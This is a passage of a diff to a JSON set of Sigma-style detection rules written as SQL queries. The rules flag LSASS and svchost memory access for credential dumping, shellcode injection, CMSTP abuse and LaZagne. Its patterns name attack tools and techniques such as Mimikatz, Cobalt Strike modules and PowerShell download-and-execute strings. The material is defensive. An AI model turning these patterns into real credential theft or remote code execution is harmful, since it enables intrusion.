'%\\\\thor.exe' ESCAPE '\\') AND GrantedAccess = '0x1fffff')))" ], - "filename": "proc_creation_win_hktl_invoke_obfuscation_via_stdin.yml" + "filename": "proc_access_win_susp_proc_access_lsass.yml" }, { - "title": "Security Privileges Enumeration Via Whoami.EXE", - "id": "97a80ec7-0e2f-4d05-9ef4-65760e634f6b", + "title": "Potential Svchost Memory Access", + "id": 
"166e9c50-8cd9-44af-815d-d1f0c0e90dde", "status": "experimental", - "description": "Detects a whoami.exe executed with the /priv command line flag instructing the tool to show all current user privileges. This is often used after a privilege escalation attempt.", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects potential access to svchost process memory such as that used by Invoke-Phantom to kill the winRM windows event logging service.", + "author": "Tim Burrell", "tags": [ - "attack.privilege_escalation", - "attack.discovery", - "attack.t1033" + "attack.defense_evasion", + "attack.t1562.002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\whoami.exe' ESCAPE '\\' OR OriginalFileName = 'whoami.exe') AND (CommandLine LIKE '% /priv%' ESCAPE '\\' OR CommandLine LIKE '% -priv%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((TargetImage LIKE '%\\\\WINDOWS\\\\System32\\\\svchost.exe' ESCAPE '\\' AND GrantedAccess = '0x1F3FFF' AND CallTrace LIKE '%UNKNOWN%' ESCAPE '\\') AND NOT ((SourceImage LIKE 'C:\\\\Program Files\\\\Microsoft Visual Studio\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\MSBuild\\\\Current\\\\Bin\\\\MSBuild.exe' ESCAPE '\\' AND (CallTrace LIKE '%Microsoft.Build.ni.dll%' ESCAPE '\\' OR CallTrace LIKE '%System.ni.dll%' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_whoami_priv_discovery.yml" + "filename": "proc_access_win_invoke_phantom.yml" }, { - "title": "Suspicious Cabinet File Expansion", - "id": "9f107a84-532c-41af-b005-8d12a607639f", - "status": "test", - "description": "Adversaries can use the built-in expand utility to decompress cab files as seen in recent Iranian MeteorExpress attack", - "author": "Bhabesh Raj", + "title": "LSASS Memory Dump", + "id": "5ef9853e-4d0e-4a70-846f-a9ca37d876da", + "status": "experimental", + "description": "Detects process LSASS memory dump using Mimikatz, NanoDump, 
Invoke-Mimikatz, Procdump or Taskmgr based on the CallTrace pointing to ntdll.dll, dbghelp.dll or dbgcore.dll for win10, server2016 and up.", + "author": "Samir Bousseaden, Michael Haag", "tags": [ - "attack.execution", - "attack.t1218" + "attack.credential_access", + "attack.t1003.001", + "attack.s0002" ], "falsepositives": [ - "System administrator Usage" + "False positives are present when looking for 0x1410. Exclusions may be required." ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\expand.exe' ESCAPE '\\' AND (CommandLine LIKE '%.cab%' ESCAPE '\\' OR CommandLine LIKE '%/F:%' ESCAPE '\\' OR CommandLine LIKE '%-F:%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\ProgramData\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Roaming\\\\Temp\\\\%' ESCAPE '\\')) AND NOT ((ParentProcessName LIKE 'C:\\\\Program Files (x86)\\\\Dell\\\\UpdateService\\\\ServiceShell.exe' ESCAPE '\\' AND CommandLine LIKE '%C:\\\\ProgramData\\\\Dell\\\\UpdateService\\\\Temp\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((TargetImage LIKE '%\\\\lsass.exe' ESCAPE '\\' AND (GrantedAccess LIKE '%0x1038%' ESCAPE '\\' OR GrantedAccess LIKE '%0x1438%' ESCAPE '\\' OR GrantedAccess LIKE '%0x143a%' ESCAPE '\\') AND (CallTrace LIKE '%dbghelp.dll%' ESCAPE '\\' OR CallTrace LIKE '%dbgcore.dll%' ESCAPE '\\' OR CallTrace LIKE '%ntdll.dll%' ESCAPE '\\')) AND NOT ((CallTrace LIKE '%|C:\\\\Windows\\\\Temp\\\\asgard2-agent\\\\%' ESCAPE '\\' AND CallTrace LIKE '%\\\\thor\\\\thor64.exe+%' ESCAPE '\\' AND CallTrace LIKE '%|UNKNOWN(%' ESCAPE '\\' AND GrantedAccess = '0x103800') OR (SourceImage LIKE 'C:\\\\Windows\\\\Sysmon64.exe' ESCAPE '\\')))" ], - "filename": "proc_creation_win_expand_cabinet_files.yml" + "filename": "proc_access_win_lsass_memdump.yml" }, { - "title": "Suspicious 
Process Created Via Wmic.EXE", - "id": "3c89a1e8-0fba-449e-8f1b-8409d6267ec8", - "status": "test", - "description": "Detects WMIC executing \"process call create\" with suspicious calls to processes such as \"rundll32\", \"regsrv32\", etc.", - "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", + "title": "CMSTP Execution Process Access", + "id": "3b4b232a-af90-427c-a22f-30b0c0837b95", + "status": "stable", + "description": "Detects various indicators of Microsoft Connection Manager Profile Installer execution", + "author": "Nik Seetharaman", "tags": [ + "attack.defense_evasion", + "attack.t1218.003", "attack.execution", - "attack.t1047" + "attack.t1559.001", + "attack.g0069", + "attack.g0080", + "car.2019-04-001" ], "falsepositives": [ - "Unknown" + "Legitimate CMSTP use (unlikely in modern enterprise environments)" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%process %' ESCAPE '\\' AND CommandLine LIKE '%call %' ESCAPE '\\' AND CommandLine LIKE '%create %' ESCAPE '\\' AND (CommandLine LIKE '%rundll32%' ESCAPE '\\' OR CommandLine LIKE '%bitsadmin%' ESCAPE '\\' OR CommandLine LIKE '%regsvr32%' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /c %' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /k %' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /r %' ESCAPE '\\' OR CommandLine LIKE '%cmd /c %' ESCAPE '\\' OR CommandLine LIKE '%cmd /k %' ESCAPE '\\' OR CommandLine LIKE '%cmd /r %' ESCAPE '\\' OR CommandLine LIKE '%powershell%' ESCAPE '\\' OR CommandLine LIKE '%pwsh%' ESCAPE '\\' OR CommandLine LIKE '%certutil%' ESCAPE '\\' OR CommandLine LIKE '%cscript%' ESCAPE '\\' OR CommandLine LIKE '%wscript%' ESCAPE '\\' OR CommandLine LIKE '%mshta%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Local\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\%temp\\%%' ESCAPE 
'\\' OR CommandLine LIKE '%\\%tmp\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%ProgramData\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%appdata\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%comspec\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%localappdata\\%%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE CallTrace LIKE '%cmlua.dll%' ESCAPE '\\'" ], - "filename": "proc_creation_win_wmic_susp_process_creation.yml" + "filename": "proc_access_win_cmstp_execution_by_access.yml" }, { - "title": "Suspicious TSCON Start as SYSTEM", - "id": "9847f263-4a81-424f-970c-875dab15b79b", - "status": "experimental", - "description": "Detects a tscon.exe start as LOCAL SYSTEM", - "author": "Florian Roth (Nextron Systems)", + "title": "SVCHOST Credential Dump", + "id": "174afcfa-6e40-4ae9-af64-496546389294", + "status": "test", + "description": "Detects when a process, such as mimikatz, accesses the memory of svchost to dump credentials", + "author": "Florent Labouyrie", "tags": [ - "attack.command_and_control", - "attack.t1219" + "attack.t1548" ], "falsepositives": [ - "Unknown" + "Non identified legit exectubale" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\') AND NewProcessName LIKE '%\\\\tscon.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((TargetImage LIKE '%\\\\svchost.exe' ESCAPE '\\' AND GrantedAccess = '0x143a') AND NOT ((SourceImage LIKE '%\\\\services.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\msiexec.exe' ESCAPE '\\')))" ], - "filename": "proc_creation_win_tscon_localsystem.yml" + "filename": "proc_access_win_svchost_cred_dump.yml" }, { - "title": "DLL Execution Via Register-cimprovider.exe", - "id": "a2910908-e86f-4687-aeba-76a5f996e652", - "status": "test", - "description": "Detects using register-cimprovider.exe to execute arbitrary dll file.", - "author": "Ivan Dyachkov, Yulia Fomina, oscd.community", + "title": "Credential Dumping by LaZagne", + "id": 
"4b9a8556-99c4-470b-a40c-9c8d02c77ed0", + "status": "stable", + "description": "Detects LSASS process access by LaZagne for credential dumping.", + "author": "Bhabesh Raj, Jonhnathan Ribeiro", "tags": [ - "attack.defense_evasion", - "attack.t1574" + "attack.credential_access", + "attack.t1003.001", + "attack.s0349" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\register-cimprovider.exe' ESCAPE '\\' AND CommandLine LIKE '%-path%' ESCAPE '\\' AND CommandLine LIKE '%dll%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (TargetImage LIKE '%\\\\lsass.exe' ESCAPE '\\' AND CallTrace LIKE '%C:\\\\Windows\\\\SYSTEM32\\\\ntdll.dll+%' ESCAPE '\\' AND CallTrace LIKE '%|C:\\\\Windows\\\\System32\\\\KERNELBASE.dll+%' ESCAPE '\\' AND CallTrace LIKE '%\\_ctypes.pyd+%' ESCAPE '\\' AND CallTrace LIKE '%python27.dll+%' ESCAPE '\\' AND GrantedAccess = '0x1FFFFF')" ], - "filename": "proc_creation_win_registry_cimprovider_dll_load.yml" + "filename": "proc_access_win_lazagne_cred_dump_lsass_access.yml" }, { - "title": "Download Arbitrary Files Via MSOHTMED.EXE", - "id": "459f2f98-397b-4a4a-9f47-6a5ec2f1c69d", + "title": "Potential Shellcode Injection", + "id": "250ae82f-736e-4844-a68b-0b5e8cc887da", "status": "experimental", - "description": "Detects usage of \"MSOHTMED\" to download arbitrary files", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects potential shellcode injection used by tools such as Metasploit's migrate and Empire's psinject", + "author": "Bhabesh Raj", "tags": [ "attack.defense_evasion", - "attack.execution", - "attack.t1218" + "attack.privilege_escalation", + "attack.t1055" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\MSOHTMED.exe' ESCAPE '\\' OR 
OriginalFileName = 'MsoHtmEd.exe') AND (CommandLine LIKE '%http://%' ESCAPE '\\' OR CommandLine LIKE '%https://%' ESCAPE '\\' OR CommandLine LIKE '%ftp://%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((GrantedAccess IN ('0x147a', '0x1f3fff') AND CallTrace LIKE '%UNKNOWN%' ESCAPE '\\') AND NOT (((SourceImage LIKE 'C:\\\\Program Files\\\\Dell\\\\%' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Program Files (x86)\\\\Dell\\\\%' ESCAPE '\\') AND (TargetImage LIKE 'C:\\\\Program Files\\\\Dell\\\\%' ESCAPE '\\' OR TargetImage LIKE 'C:\\\\Program Files (x86)\\\\Dell\\\\%' ESCAPE '\\') AND GrantedAccess = '0x1F3FFF' AND CallTrace LIKE 'C:\\\\Windows\\\\System32\\\\ntdll.dll%' ESCAPE '\\') OR (SourceImage LIKE 'C:\\\\Program Files (x86)\\\\Dell\\\\UpdateService\\\\ServiceShell.exe' ESCAPE '\\' AND TargetImage LIKE 'C:\\\\Windows\\\\Explorer.EXE' ESCAPE '\\' AND GrantedAccess = '0x1F3FFF' AND CallTrace LIKE 'C:\\\\Windows\\\\System32\\\\ntdll.dll%' ESCAPE '\\') OR ((SourceImage LIKE 'C:\\\\Program Files\\\\Microsoft Visual Studio\\\\2022\\\\Community\\\\Common7\\\\IDE\\\\PerfWatson2.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Program Files (x86)\\\\Microsoft Visual Studio\\\\2019\\\\Community\\\\Common7\\\\IDE\\\\PerfWatson2.exe' ESCAPE '\\') AND (TargetImage LIKE 'C:\\\\Program Files\\\\Microsoft Visual Studio\\\\2022\\\\Community\\\\Common7\\\\IDE\\\\devenv.exe' ESCAPE '\\' OR TargetImage LIKE 'C:\\\\Program Files (x86)\\\\Microsoft Visual Studio\\\\2019\\\\Community\\\\Common7\\\\IDE\\\\devenv.exe' ESCAPE '\\') AND CallTrace LIKE 'C:\\\\Windows\\\\System32\\\\ntdll.dll%' ESCAPE '\\') OR (SourceImage LIKE 'C:\\\\Program Files\\\\Microsoft Visual Studio\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\MSBuild\\\\Current\\\\Bin\\\\MSBuild.exe' ESCAPE '\\' AND TargetImage LIKE 'C:\\\\Program Files\\\\Dell\\\\DellDataVault\\\\DDVDataCollector.exe' ESCAPE '\\') OR (SourceImage LIKE 'C:\\\\Windows\\\\System32\\\\Wbem\\\\Wmiprvse.exe' ESCAPE '\\' AND TargetImage LIKE 
'C:\\\\Windows\\\\system32\\\\lsass.exe' ESCAPE '\\' AND CallTrace LIKE 'C:\\\\Windows\\\\SYSTEM32\\\\ntdll.dll%' ESCAPE '\\' AND CallTrace LIKE '%\\\\System.ni.dll+%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_lolbin_msohtmed_download.yml" + "filename": "proc_access_win_shellcode_inject_msf_empire.yml" }, { - "title": "Operator Bloopers Cobalt Strike Modules", - "id": "4f154fb6-27d1-4813-a759-78b93e0b9c48", + "title": "LSASS Access from Program in Suspicious Folder", + "id": "fa34b441-961a-42fa-a100-ecc28c886725", "status": "experimental", - "description": "Detects Cobalt Strike module/commands accidentally entered in CMD shell", - "author": "_pete_0, TheDFIRReport", + "description": "Detects process access to LSASS memory with suspicious access flags and from a suspicious folder", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1059.003" + "attack.credential_access", + "attack.t1003.001", + "attack.s0002" ], "falsepositives": [ - "Unknown" + "Updaters and installers are typical false positives. 
Apply custom filters depending on your environment" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (OriginalFileName = 'Cmd.Exe' OR NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\') AND (CommandLine LIKE '%Invoke-UserHunter%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-ShareFinder%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Kerberoast%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-SMBAutoBrute%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Nightmare%' ESCAPE '\\' OR CommandLine LIKE '%zerologon%' ESCAPE '\\' OR CommandLine LIKE '%av\\_query%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((TargetImage LIKE '%\\\\lsass.exe' ESCAPE '\\' AND (GrantedAccess LIKE '%10' ESCAPE '\\' OR GrantedAccess LIKE '%30' ESCAPE '\\' OR GrantedAccess LIKE '%50' ESCAPE '\\' OR GrantedAccess LIKE '%70' ESCAPE '\\' OR GrantedAccess LIKE '%90' ESCAPE '\\' OR GrantedAccess LIKE '%B0' ESCAPE '\\' OR GrantedAccess LIKE '%D0' ESCAPE '\\' OR GrantedAccess LIKE '%F0' ESCAPE '\\' OR GrantedAccess LIKE '%18' ESCAPE '\\' OR GrantedAccess LIKE '%38' ESCAPE '\\' OR GrantedAccess LIKE '%58' ESCAPE '\\' OR GrantedAccess LIKE '%78' ESCAPE '\\' OR GrantedAccess LIKE '%98' ESCAPE '\\' OR GrantedAccess LIKE '%B8' ESCAPE '\\' OR GrantedAccess LIKE '%D8' ESCAPE '\\' OR GrantedAccess LIKE '%F8' ESCAPE '\\' OR GrantedAccess LIKE '%1A' ESCAPE '\\' OR GrantedAccess LIKE '%3A' ESCAPE '\\' OR GrantedAccess LIKE '%5A' ESCAPE '\\' OR GrantedAccess LIKE '%7A' ESCAPE '\\' OR GrantedAccess LIKE '%9A' ESCAPE '\\' OR GrantedAccess LIKE '%BA' ESCAPE '\\' OR GrantedAccess LIKE '%DA' ESCAPE '\\' OR GrantedAccess LIKE '%FA' ESCAPE '\\' OR GrantedAccess LIKE '%0x14C2' ESCAPE '\\' OR GrantedAccess LIKE '%FF' ESCAPE '\\') AND (SourceImage LIKE '%\\\\Temp\\\\%' ESCAPE '\\' OR SourceImage LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR SourceImage LIKE '%\\\\PerfLogs\\\\%' ESCAPE '\\' OR SourceImage LIKE '%\\\\AppData\\\\%' ESCAPE '\\' OR SourceImage LIKE '%\\\\Temporary%' ESCAPE 
'\\')) AND NOT ((SourceImage LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\AppData\\\\Local\\\\%' ESCAPE '\\' AND (SourceImage LIKE '%\\\\Microsoft VS Code\\\\Code.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\software\\_reporter\\_tool.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\DropboxUpdate.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\MBAMInstallerService.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\WebexMTA.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\WebEx\\\\WebexHost.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\JetBrains\\\\Toolbox\\\\bin\\\\jetbrains-toolbox.exe' ESCAPE '\\') AND GrantedAccess = '0x410') OR (SourceImage LIKE 'C:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' AND SourceImage LIKE '%.tmp\\\\DropboxUpdate.exe' ESCAPE '\\' AND GrantedAccess IN ('0x410', '0x1410')) OR (SourceImage LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' AND SourceImage LIKE '%.tmp\\\\DropboxUpdate.exe' ESCAPE '\\' AND GrantedAccess = '0x1410') OR ((SourceImage LIKE 'C:\\\\Windows\\\\Temp\\\\asgard2-agent\\\\%' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Windows\\\\Temp\\\\asgard2-agent-sc\\\\%' ESCAPE '\\') AND (SourceImage LIKE '%\\\\thor64.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\thor.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\aurora-agent-64.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\aurora-agent.exe' ESCAPE '\\') AND GrantedAccess IN ('0x1fffff', '0x1010', '0x101010')) OR (SourceImage LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\vs\\_bootstrapper\\_%' ESCAPE '\\' AND GrantedAccess = '0x1410') OR (SourceImage LIKE 'C:\\\\Program Files (x86)\\\\Google\\\\Temp\\\\%' ESCAPE '\\' AND SourceImage LIKE '%.tmp\\\\GoogleUpdate.exe' ESCAPE '\\' AND GrantedAccess IN ('0x410', '0x1410')) OR (SourceImage LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\AppData\\\\Local\\\\Keybase\\\\keybase.exe' ESCAPE '\\' AND GrantedAccess = 
'0x1fffff') OR (SourceImage LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\is-%' ESCAPE '\\' AND SourceImage LIKE '%.tmp\\\\avira\\_system\\_speedup.tmp' ESCAPE '\\' AND GrantedAccess = '0x1410') OR (SourceImage LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\AppData\\\\Roaming\\\\ViberPC\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\updater.exe' ESCAPE '\\' AND TargetImage LIKE '%\\\\winlogon.exe' ESCAPE '\\' AND GrantedAccess = '0x1fffff') OR ((SourceImage LIKE 'C:\\\\Program Files\\\\Common Files\\\\Adobe\\\\ARM\\\\%' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Program Files (x86)\\\\Common Files\\\\Adobe\\\\ARM\\\\%' ESCAPE '\\') AND SourceImage LIKE '%\\\\AdobeARMHelper.exe' ESCAPE '\\' AND GrantedAccess = '0x1410')))" ], - "filename": "proc_creation_win_hktl_cobaltstrike_bloopers_modules.yml" + "filename": "proc_access_win_susp_proc_access_lsass_susp_source.yml" }, { - "title": "Renamed Plink Execution", - "id": "1c12727d-02bf-45ff-a9f3-d49806a3cf43", + "title": "Credential Dumping Tools Accessing LSASS Memory", + "id": "32d0d3e2-e58d-4d41-926b-18b520b2b32d", "status": "experimental", - "description": "Detects the execution of a renamed version of the Plink binary", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects processes requesting access to LSASS memory via suspicious access masks. 
This is typical for credentials dumping tools", + "author": "Florian Roth, Roberto Rodriguez, Dimitrios Slamaris, Mark Russinovich, Thomas Patzke, Teymur Kheirkhabarov, Sherif Eldeeb, James Dickenson, Aleksey Potapov, oscd.community", "tags": [ - "attack.defense_evasion", - "attack.t1036" + "attack.credential_access", + "attack.t1003.001", + "attack.s0002", + "car.2019-04-004" ], "falsepositives": [ - "Unknown" + "Likely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (OriginalFileName = 'Plink' OR (CommandLine LIKE '% -l forward%' ESCAPE '\\' AND CommandLine LIKE '% -P %' ESCAPE '\\' AND CommandLine LIKE '% -R %' ESCAPE '\\')) AND NOT (NewProcessName LIKE '%\\\\plink.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((TargetImage LIKE '%\\\\lsass.exe' ESCAPE '\\' AND (GrantedAccess LIKE '0x40%' ESCAPE '\\' OR GrantedAccess LIKE '0x100000%' ESCAPE '\\' OR GrantedAccess LIKE '0x1410%' ESCAPE '\\' OR GrantedAccess LIKE '0x1438%' ESCAPE '\\' OR GrantedAccess LIKE '0x143a%' ESCAPE '\\' OR GrantedAccess LIKE '0x1418%' ESCAPE '\\' OR GrantedAccess LIKE '0x1f0fff%' ESCAPE '\\' OR GrantedAccess LIKE '0x1f1fff%' ESCAPE '\\' OR GrantedAccess LIKE '0x1f2fff%' ESCAPE '\\' OR GrantedAccess LIKE '0x1f3fff%' ESCAPE '\\')) AND NOT (((SourceImage LIKE 'C:\\\\WINDOWS\\\\system32\\\\taskmgr.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Windows\\\\System32\\\\perfmon.exe' ESCAPE '\\')) OR ((SourceImage LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\') AND GrantedAccess IN ('0x1410', '0x410')) OR ((SourceImage LIKE 'C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\%' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Program Files\\\\Windows Defender\\\\%' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Program Files\\\\Microsoft Security Client\\\\MsMpEng.exe%' ESCAPE '\\') AND SourceImage LIKE '%\\\\MsMpEng.exe' ESCAPE '\\') OR (SourceImage LIKE 
'C:\\\\Windows\\\\System32\\\\svchost.exe' ESCAPE '\\' AND CallTrace LIKE '%|C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\Definition Updates\\\\{%' ESCAPE '\\' AND CallTrace LIKE '%}\\\\mpengine.dll+%' ESCAPE '\\' AND GrantedAccess = '0x1418') OR ((CallTrace LIKE '%|c:\\\\program files\\\\windows defender\\\\mprtp.dll%' ESCAPE '\\' OR CallTrace LIKE '%|c:\\\\program files\\\\windows defender\\\\MpClient.dll%' ESCAPE '\\')) OR (SourceImage LIKE 'C:\\\\Program Files\\\\WindowsApps\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\GamingServices.exe' ESCAPE '\\' AND GrantedAccess IN ('0x1410', '0x410')) OR ((SourceImage LIKE '%\\\\PROCEXP64.EXE' ESCAPE '\\' OR SourceImage LIKE '%\\\\PROCEXP.EXE' ESCAPE '\\' OR SourceImage LIKE '%C:\\\\WINDOWS\\\\system32\\\\taskhostw.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\MBAMInstallerService.exe' ESCAPE '\\') AND GrantedAccess IN ('0x1410', '0x410', '0x40')) OR ((SourceImage LIKE 'C:\\\\WINDOWS\\\\system32\\\\wbem\\\\wmiprvse.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Windows\\\\syswow64\\\\MsiExec.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Windows\\\\System32\\\\msiexec.exe' ESCAPE '\\') AND GrantedAccess IN ('0x1410', '0x410', '0x1f1fff', '0x1f3fff')) OR ((SourceImage LIKE 'C:\\\\Windows\\\\system32\\\\wininit.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Windows\\\\System32\\\\lsass.exe' ESCAPE '\\') AND GrantedAccess = '0x1000000') OR (SourceImage LIKE 'C:\\\\ProgramData\\\\VMware\\\\VMware Tools\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\vmtoolsd.exe' ESCAPE '\\') OR (SourceImage LIKE 'C:\\\\WINDOWS\\\\system32\\\\svchost.exe' ESCAPE '\\' AND GrantedAccess IN ('0x100000', '0x1410')) OR ((SourceImage LIKE '%\\\\thor.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\thor64.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\aurora-agent.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\aurora-agent-64.exe' ESCAPE '\\') AND GrantedAccess IN ('0x40', '0x1010')) OR (SourceImage LIKE '%\\\\explorer.exe' ESCAPE '\\' AND GrantedAccess = '0x401') OR 
(SourceImage LIKE 'C:\\\\Windows\\\\system32\\\\MRT.exe' ESCAPE '\\' AND GrantedAccess IN ('0x1410', '0x1418')) OR (GrantedAccess = '0x40' AND (SourceImage LIKE '%\\\\handle.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\handle64.exe' ESCAPE '\\')) OR (SourceImage LIKE 'C:\\\\Program Files (x86)\\\\Microsoft\\\\Edge\\\\Application\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\Installer\\\\setup.exe' ESCAPE '\\') OR (SourceImage LIKE '%\\\\AppData\\\\Local\\\\WebEx\\\\WebexHost.exe' ESCAPE '\\' AND GrantedAccess = '0x401') OR (SourceImage LIKE 'C:\\\\PROGRAMDATA\\\\MALWAREBYTES\\\\MBAMSERVICE\\\\ctlrupdate\\\\mbupdatr.exe' ESCAPE '\\' AND GrantedAccess = '0x1410') OR ((SourceImage LIKE '%:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR SourceImage LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\') AND SourceImage LIKE '%.tmp\\\\DropboxUpdate.exe' ESCAPE '\\' AND GrantedAccess IN ('0x410', '0x1410')) OR (SourceImage LIKE 'C:\\\\Program Files\\\\Microsoft Visual Studio\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\MSBuild\\\\Current\\\\Bin\\\\MSBuild.exe' ESCAPE '\\' AND GrantedAccess = '0x1F3FFF') OR (SourceImage LIKE '%\\\\SteamLibrary\\\\steamapps\\\\%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_renamed_plink.yml" + "filename": "proc_access_win_cred_dump_lsass_access.yml" }, { - "title": "Suspicious PowerShell Download and Execute Pattern", - "id": "e6c54d94-498c-4562-a37c-b469d8e9a275", - "status": "experimental", - "description": "Detects suspicious PowerShell download patterns that are often used in malicious scripts, stagers or downloaders (make sure that your backend applies the strings case-insensitive)", + "title": "WerFault Accassing LSASS", + "id": "e5b33f7d-eb93-48b6-9851-09e1e610b6d7", + "status": "test", + "description": "Detects process LSASS memory dump using Mimikatz, NanoDump, Invoke-Mimikatz, Procdump or Taskmgr based on the CallTrace pointing to ntdll.dll, dbghelp.dll or dbgcore.dll for win10, server2016 and up.", "author": "Florian Roth (Nextron 
Systems)", "tags": [ - "attack.execution", - "attack.t1059.001" + "attack.credential_access", + "attack.t1003.001", + "attack.s0002" ], "falsepositives": [ - "Software installers that pull packages from remote systems and execute them" + "Actual failures in lsass.exe that trigger a crash dump (unlikely)", + "Unknown cases in which WerFault accesses lsass.exe" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '%IEX ((New-Object Net.WebClient).DownloadString%' ESCAPE '\\' OR CommandLine LIKE '%IEX (New-Object Net.WebClient).DownloadString%' ESCAPE '\\' OR CommandLine LIKE '%IEX((New-Object Net.WebClient).DownloadString%' ESCAPE '\\' OR CommandLine LIKE '%IEX(New-Object Net.WebClient).DownloadString%' ESCAPE '\\' OR CommandLine LIKE '% -command (New-Object System.Net.WebClient).DownloadFile(%' ESCAPE '\\' OR CommandLine LIKE '% -c (New-Object 